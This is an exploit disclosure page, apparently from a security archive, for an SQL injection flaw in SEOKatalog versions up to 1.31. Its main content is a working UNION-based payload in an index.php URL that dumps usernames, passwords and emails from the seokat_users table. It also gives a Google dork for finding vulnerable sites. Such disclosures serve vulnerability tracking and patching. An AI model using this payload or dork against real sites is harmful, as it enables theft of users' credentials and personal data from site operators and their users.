Bug: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability

Published
Credit
Risk
2012.06.04
Smugller
Medium
CWE
CVE
Local
Remote
CWE-89
N/A ( Add )
No
Yes
 Dork: intext:"Powered by SEOKatalog 1.31"

#################
# SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
#################
# Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
# Version: <= 1.31 #
# Vendor: http://www.seokatalogi.pl/ #
# Category: webapps #
# Date: 08.09.2011 #
# Author: Smugller #
# Contact: smugll3r[alt+64]gmail.com #
# Group: DevilTeam #
# Website: http://devilteam.pl #
# From: Poland #
# Google Dork: intext:"Powered by SEOKatalog 1.31" #
#################

# Exploit:
http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_conca
t(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--

References:

http://devilteam.pl
http://www.seokatalogi.pl/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version